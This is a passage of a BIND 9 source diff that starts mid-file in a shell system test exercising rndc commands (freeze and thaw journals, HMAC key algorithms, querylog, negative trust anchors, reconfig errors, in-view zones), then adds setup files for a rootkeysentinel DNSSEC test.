$ret` + +n=`expr $n + 1` +echo_i "checking that journal is removed when serial is changed before thaw ($n)" +ret=0 +sleep 1 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone other. +update add text6.other. 
600 IN TXT "addition 6" +send +END +[ -s ns2/other.db.jnl ] || { + echo_i "'test -s ns2/other.db.jnl' failed when it shouldn't have"; ret=1; +} +$RNDCCMD 10.53.0.2 freeze other 2>&1 | sed 's/^/ns2 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 6" ns2/other.db > /dev/null && break + sleep 1 +done +serial=`awk '$3 ~ /serial/ {print $1}' ns2/other.db` +newserial=`expr $serial + 1` +sed s/$serial/$newserial/ ns2/other.db > ns2/other.db.new +echo 'frozen TXT "frozen addition"' >> ns2/other.db.new +mv -f ns2/other.db.new ns2/other.db +$RNDCCMD 10.53.0.2 thaw 2>&1 | sed 's/^/ns2 /' | cat_i +sleep 1 +[ -f ns2/other.db.jnl ] && { + echo_i "'test -f ns2/other.db.jnl' succeeded when it shouldn't have"; ret=1; +} +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.2.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone other. +update add text7.other. 600 IN TXT "addition 7" +send +END +$DIGCMD @10.53.0.2 text6.other. TXT > dig.out.1.test$n +grep 'addition 6' dig.out.1.test$n >/dev/null || ret=1 +$DIGCMD @10.53.0.2 text7.other. TXT > dig.out.2.test$n +grep 'addition 7' dig.out.2.test$n >/dev/null || ret=1 +$DIGCMD @10.53.0.2 frozen.other. TXT > dig.out.3.test$n +grep 'frozen addition' dig.out.3.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that journal is kept when ixfr-from-differences is in use ($n)" +ret=0 +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.1.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text6.nil. 
600 IN TXT "addition 6" +send +END +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +$RNDCCMD 10.53.0.2 freeze nil 2>&1 | sed 's/^/ns2 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 10 +do + grep "addition 6" ns2/nil.db > /dev/null && break + sleep 1 +done +serial=`awk '$3 ~ /serial/ {print $1}' ns2/nil.db` +newserial=`expr $serial + 1` +sed s/$serial/$newserial/ ns2/nil.db > ns2/nil.db.new +echo 'frozen TXT "frozen addition"' >> ns2/nil.db.new +mv -f ns2/nil.db.new ns2/nil.db +$RNDCCMD 10.53.0.2 thaw 2>&1 | sed 's/^/ns2 /' | cat_i +sleep 1 +[ -s ns2/nil.db.jnl ] || { + echo_i "'test -s ns2/nil.db.jnl' failed when it shouldn't have"; ret=1; +} +$NSUPDATE -p ${PORT} -k ns2/session.key > nsupdate.out.2.test$n 2>&1 <<END || ret=1 +server 10.53.0.2 +zone nil. +update add text7.nil. 600 IN TXT "addition 7" +send +END +$DIGCMD @10.53.0.2 text6.nil. TXT > dig.out.1.test$n +grep 'addition 6' dig.out.1.test$n > /dev/null || ret=1 +$DIGCMD @10.53.0.2 text7.nil. TXT > dig.out.2.test$n +grep 'addition 7' dig.out.2.test$n > /dev/null || ret=1 +$DIGCMD @10.53.0.2 frozen.nil. 
TXT > dig.out.3.test$n +grep 'frozen addition' dig.out.3.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# temp test +echo_i "dumping stats ($n)" +$RNDCCMD 10.53.0.2 stats +n=`expr $n + 1` +echo_i "verifying adb records in named.stats ($n)" +grep "ADB stats" ns2/named.stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test using second key ($n)" +ret=0 +$RNDC -s 10.53.0.2 -p ${CONTROLPORT} -c ns2/secondkey.conf status > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc dumpdb' on a empty cache ($n)" +ret=0 +rndc_dumpdb ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reload' on a zone with include files ($n)" +ret=0 +grep "incl/IN: skipping load" ns2/named.run > /dev/null && ret=1 +loads=`grep "incl/IN: starting load" ns2/named.run | wc -l` +[ "$loads" -eq 1 ] || ret=1 +$RNDCCMD 10.53.0.2 reload > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 +do + tmp=0 + grep "incl/IN: skipping load" ns2/named.run > /dev/null || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +touch ns2/static.db +$RNDCCMD 10.53.0.2 reload > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 +do + tmp=0 + loads=`grep "incl/IN: starting load" ns2/named.run | wc -l` + [ "$loads" -eq 2 ] || tmp=1 + [ $tmp -eq 0 ] && break + sleep 1 +done +[ $tmp -eq 1 ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=$((n+1)) +if $FEATURETEST --md5; then + echo_i "testing rndc with hmac-md5 ($n)" + ret=0 + $RNDC -s 10.53.0.4 -p ${EXTRAPORT1} -c ns4/key1.conf status > /dev/null 2>&1 || ret=1 + for i in 2 3 4 5 6 + do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT1} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 + done + if [ $ret != 0 ]; then echo_i "failed"; fi + 
status=$((status+ret)) +else + echo_i "skipping rndc with hmac-md5 ($n)" +fi + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha1 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT2} -c ns4/key2.conf status > /dev/null 2>&1 || ret=1 +for i in 1 3 4 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT2} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha224 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT3} -c ns4/key3.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 4 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT3} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha256 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT4} -c ns4/key4.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 5 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT4} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha384 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT5} -c ns4/key5.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 4 6 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT5} -c ns4/key${i}.conf status > /dev/null 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with hmac-sha512 ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > /dev/null 2>&1 || ret=1 +for i in 1 2 3 4 5 +do + $RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key${i}.conf status > /dev/null 2>&1 2>&1 && ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing single control channel with multiple algorithms ($n)" +ret=0 +for i in 1 2 3 4 5 6 +do + $RNDC -s 10.53.0.4 -p 
${EXTRAPORT7} -c ns4/key${i}.conf status > /dev/null 2>&1 || ret=1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing automatic zones are reported ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n || ret=1 +grep "number of zones: 201 (198 automatic)" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with null command ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with unknown control channel command ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf obviouslynotacommand >/dev/null 2>&1 && ret=1 +# rndc: 'obviouslynotacommand' failed: unknown command +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with querylog command ($n)" +ret=0 +# first enable it with querylog on option +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf querylog on >/dev/null 2>&1 || ret=1 +grep "query logging is now on" ns4/named.run > /dev/null || ret=1 +# query for builtin and check if query was logged (without +subnet) +$DIG @10.53.0.4 -p ${PORT} -c ch -t txt foo12345.bind +qr > dig.out.1.test$n 2>&1 || ret=1 +grep "query: foo12345.bind CH TXT.*(.*)$" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=127.0.0.1) +$DIG +subnet=127.0.0.1 @10.53.0.4 -p ${PORT} -c ch -t txt foo12346.bind +qr > dig.out.2.test$n 2>&1 || ret=1 +grep "query: foo12346.bind CH TXT.*\[ECS 127\.0\.0\.1/32/0]" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=127.0.0.1/24) +$DIG +subnet=127.0.0.1/24 @10.53.0.4 -p ${PORT} -c ch -t txt foo12347.bind +qr > 
dig.out.3.test$n 2>&1 || ret=1 +grep "query: foo12347.bind CH TXT.*\[ECS 127\.0\.0\.0/24/0]" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (with +subnet=::1) +$DIG +subnet=::1 @10.53.0.4 -p ${PORT} -c ch -t txt foo12348.bind +qr > dig.out.4.test$n 2>&1 || ret=1 +grep "query: foo12348.bind CH TXT.*\[ECS ::1/128/0]" ns4/named.run > /dev/null || ret=1 +# toggle query logging and check again +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf querylog > /dev/null 2>&1 || ret=1 +grep "query logging is now off" ns4/named.run > /dev/null || ret=1 +# query for another builtin zone and check if query was logged (without +subnet) +$DIG @10.53.0.4 -p ${PORT} -c ch -t txt foo9876.bind +qr > dig.out.5.test$n 2>&1 || ret=1 +grep "query: foo9876.bind CH TXT.*(.*)$" ns4/named.run > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +RNDCCMD4="$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf" +n=`expr $n + 1` +echo_i "testing rndc nta time limits ($n)" +ret=0 +$RNDCCMD4 nta -l 2h nta1.example > rndc.out.1.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.1.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 1d nta2.example > rndc.out.2.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.2.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 1w nta3.example > rndc.out.3.test$n 2>&1 +grep "Negative trust anchor added" rndc.out.3.test$n > /dev/null || ret=1 +$RNDCCMD4 nta -l 8d nta4.example > rndc.out.4.test$n 2>&1 +grep "NTA lifetime cannot exceed one week" rndc.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc nta -class option ($n)" +ret=0 +nextpart ns4/named.run > /dev/null +$RNDCCMD4 nta -c in nta1.example > rndc.out.1.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null || ret=1 +$RNDCCMD4 nta -c any nta1.example > rndc.out.2.test$n 2>&1 +nextpart 
ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null || ret=1 +$RNDCCMD4 nta -c ch nta1.example > rndc.out.3.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null && ret=1 +$RNDCCMD4 nta -c fake nta1.example > rndc.out.4.test$n 2>&1 +nextpart ns4/named.run | grep "added NTA 'nta1.example'" > /dev/null && ret=1 +grep 'unknown class' rndc.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +for i in 512 1024 2048 4096 8192 16384 32768 65536 131072 262144 524288 +do + n=`expr $n + 1` + echo_i "testing rndc buffer size limits (size=${i}) ($n)" + ret=0 + $RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf testgen ${i} 2>&1 > rndc.out.$i.test$n || ret=1 + actual_size=`$GENCHECK rndc.out.$i.test$n` + if [ "$?" = "0" ]; then + expected_size=`expr $i + 1` + if [ $actual_size != $expected_size ]; then ret=1; fi + else + ret=1 + fi + + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "testing rndc -r (show result) ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf -r testgen 0 2>&1 > rndc.out.1.test$n || ret=1 +grep "ISC_R_SUCCESS 0" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing rndc with a token containing a space ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf -r flush '"view with a space"' 2>&1 > rndc.out.1.test$n || ret=1 +grep "not found" rndc.out.1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reconfig' with a broken config ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > /dev/null || ret=1 +sleep 1 +mv ns4/named.conf ns4/named.conf.save +echo "error error error" >> ns4/named.conf +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > rndc.out.1.test$n 
2>&1 && ret=1 +grep "rndc: 'reconfig' failed: unexpected token" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc status reports failure ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n 2>&1 || ret=1 +grep "reload/reconfig failed" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "restore working config ($n)" +ret=0 +mv ns4/named.conf.save ns4/named.conf +sleep 1 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf reconfig > /dev/null || ret=1 +sleep 1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check 'rndc status' 'reload/reconfig failure' is cleared after successful reload/reconfig ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf status > rndc.out.1.test$n 2>&1 || ret=1 +grep "reload/reconfig failed" rndc.out.1.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test read-only control channel access ($n)" +ret=0 +$RNDCCMD 10.53.0.5 status > rndc.out.1.test$n 2>&1 || ret=1 +$RNDCCMD 10.53.0.5 nta -dump > rndc.out.2.test$n 2>&1 || ret=1 +$RNDCCMD 10.53.0.5 reconfig > rndc.out.3.test$n 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test rndc status shows running on ($n)" +ret=0 +$RNDCCMD 10.53.0.5 status > rndc.out.1.test$n 2>&1 || ret=1 +grep "^running on " rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "test 'rndc reconfig' with loading of a large zone ($n)" +ret=0 +cur=`awk 'BEGIN {l=0} /^/ {l++} END { print l }' ns6/named.run` +cp ns6/named.conf ns6/named.conf.save +echo "zone \"huge.zone\" { type primary; file 
\"huge.zone.db\"; };" >> ns6/named.conf +echo_i "reloading config" +$RNDCCMD 10.53.0.6 reconfig > rndc.out.1.test$n 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +sleep 1 +n=`expr $n + 1` +echo_i "check if zone load was scheduled ($n)" +grep "scheduled loading new zones" ns6/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check if query for the zone returns SERVFAIL ($n)" +$DIG @10.53.0.6 -p ${PORT} -t soa huge.zone > dig.out.1.test$n +grep "SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed (ignored)"; ret=0; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "wait for the zones to be loaded ($n)" +ret=1 +try=0 +while test $try -lt 180 +do + sleep 1 + sed -n "$cur,"'$p' < ns6/named.run | grep "any newly configured zones are now loaded" > /dev/null && { + ret=0 + break + } + try=`expr $try + 1` +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check if query for the zone returns NOERROR ($n)" +$DIG @10.53.0.6 -p ${PORT} -t soa huge.zone > dig.out.1.test$n +grep "NOERROR" dig.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "verify that the full command is logged ($n)" +ret=0 +$RNDCCMD 10.53.0.2 null with extra arguments > /dev/null 2>&1 +grep "received control channel command 'null with extra arguments'" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +mv ns6/named.conf.save ns6/named.conf +sleep 1 +$RNDCCMD 10.53.0.6 reconfig > /dev/null || ret=1 +sleep 1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ -x "$PYTHON" ]; then + n=`expr $n + 1` + echo_i "test rndc python bindings ($n)" + ret=0 + $PYTHON > python.out.1.test$n << EOF +import sys +sys.path.insert(0, 
'../../../../bin/python') +from isc import * +r = rndc(('10.53.0.5', ${CONTROLPORT}), 'hmac-sha256', '1234abcd8765') +result = r.call('status') +print(result['text']) +EOF + grep 'server is up and running' python.out.1.test$n > /dev/null 2>&1 || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +n=`expr $n + 1` +echo_i "check 'rndc \"\"' is handled ($n)" +ret=0 +$RNDCCMD 10.53.0.2 "" > rndc.out.1.test$n 2>&1 && ret=1 +grep "rndc: '' failed: failure" rndc.out.1.test$n > /dev/null +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc -4 -6 ($n)" +ret=0 +$RNDCCMD 10.53.0.2 -4 -6 status > rndc.out.1.test$n 2>&1 && ret=1 +grep "only one of -4 and -6 allowed" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc -4 with an IPv6 server address ($n)" +ret=0 +$RNDCCMD fd92:7065:b8e:ffff::2 -4 status > rndc.out.1.test$n 2>&1 && ret=1 +grep "address family not supported" rndc.out.1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check rndc nta reports adding to multiple views ($n)" +ret=0 +$RNDCCMD 10.53.0.3 nta test.com > rndc.out.test$n 2>&1 || ret=1 +lines=`cat rndc.out.test$n | wc -l` +[ ${lines:-0} -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check 'rndc retransfer' of primary error message ($n)" +ret=0 +$RNDCCMD 10.53.0.2 retransfer nil > rndc.out.test$n 2>&1 && ret=1 +grep "rndc: 'retransfer' failed: failure" rndc.out.test$n > /dev/null || ret=1 +grep "retransfer: inappropriate zone type: primary" rndc.out.test$n > /dev/null || ret=1 +lines=`cat rndc.out.test$n | wc -l` +[ ${lines:-0} -eq 2 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=$((n+1)) +echo_i "check 'rndc freeze' with 
in-view zones works ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf freeze > rndc.out.test$n 2>&1 || ret=1 +test -s rndc.out.test$n && sed 's/^/ns2 /' rndc.out.test$n | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking non in-view zone instance is not writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} > /dev/null 2>&1 <<END && ret=1 +server 10.53.0.4 +zone example. +update add text2.example. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.4 -p ${PORT} text2.example. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc thaw' with in-view zones works ($n)" +ret=0 +$RNDC -s 10.53.0.4 -p ${EXTRAPORT6} -c ns4/key6.conf thaw > rndc.out.test$n 2>&1 || ret=1 +test -s rndc.out.test$n && sed 's/^/ns2 /' rndc.out.test$n | cat_i +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking non in-view zone instance is now writable ($n)" +ret=0 +$NSUPDATE -p ${PORT} > nsupdate.out.test$n 2>&1 <<END || ret=1 +server 10.53.0.4 +zone example. +update add text2.example. 600 IN TXT "addition 3" +send +END +$DIGCMD @10.53.0.4 -p ${PORT} text2.example. TXT > dig.out.1.test$n +grep 'addition 3' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "checking initial in-view zone file is loaded ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.1.test$n +grep 'include 1' dig.out.1.test$n >/dev/null || ret=1 +TSIG="$DEFAULT_HMAC:ext:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. 
TXT > dig.out.2.test$n +grep 'include 1' dig.out.2.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "update in-view zone ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$NSUPDATE -p ${PORT} -y "$TSIG" > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.7 +zone test. +update add text2.test. 600 IN TXT "addition 1" +send +END +[ -s ns7/test.db.jnl ] || { + echo_i "'test -s ns7/test.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking update ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text2.test. TXT > dig.out.1.test$n +grep 'addition 1' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns7/named.run > /dev/null + +echo_i "rndc freeze" +$RNDCCMD 10.53.0.7 freeze | sed 's/^/ns7 /' | cat_i | cat_i + +wait_for_log 3 "dump_done: zone test/IN/internal: enter" ns7/named.run + +echo_i "edit zone files" +cp ns7/test.db.in ns7/test.db +cp ns7/include2.db.in ns7/include.db + +echo_i "rndc thaw" +$RNDCCMD 10.53.0.7 thaw | sed 's/^/ns7 /' | cat_i + +wait_for_log 3 "zone_postload: zone test/IN/internal: done" ns7/named.run + +echo_i "rndc reload" +$RNDCCMD 10.53.0.7 reload | sed 's/^/ns7 /' | cat_i + +wait_for_log 3 "all zones loaded" ns7/named.run + +n=$((n+1)) +echo_i "checking zone file edits are loaded ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.1.test$n +grep 'include 2' dig.out.1.test$n >/dev/null || ret=1 +TSIG="$DEFAULT_HMAC:ext:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.2.test$n +grep 'include 2' dig.out.2.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
diff --git a/bin/tests/system/rootkeysentinel/clean.sh b/bin/tests/system/rootkeysentinel/clean.sh
new file mode 100644
index 0000000..e9cd3cc
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/clean.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.ns?.test*
+rm -f */dsset-*
+rm -f */named.conf
+rm -f */named.memstats
+rm -f */named.run
+rm -f */trusted.conf
+rm -f ns1/K.*
+rm -f ns1/root.db
+rm -f ns1/root.db.signed
+rm -f ns2/Kexample.*
+rm -f ns2/example.db
+rm -f ns2/example.db.signed
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/rootkeysentinel/ns1/named.conf.in b/bin/tests/system/rootkeysentinel/ns1/named.conf.in
new file mode 100644
index 0000000..930f3bc
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns1/named.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rootkeysentinel/ns1/root.db.in b/bin/tests/system/rootkeysentinel/ns1/root.db.in
new file mode 100644
index 0000000..cc97041
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns1/root.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA marka.isc.org. a.root.servers.nil. (
+ 2018031400 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/rootkeysentinel/ns1/sign.sh b/bin/tests/system/rootkeysentinel/ns1/sign.sh
new file mode 100644
index 0000000..4a1770e
--- /dev/null
+++ b/bin/tests/system/rootkeysentinel/ns1/sign.sh
@@ -0,0 +1,36 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
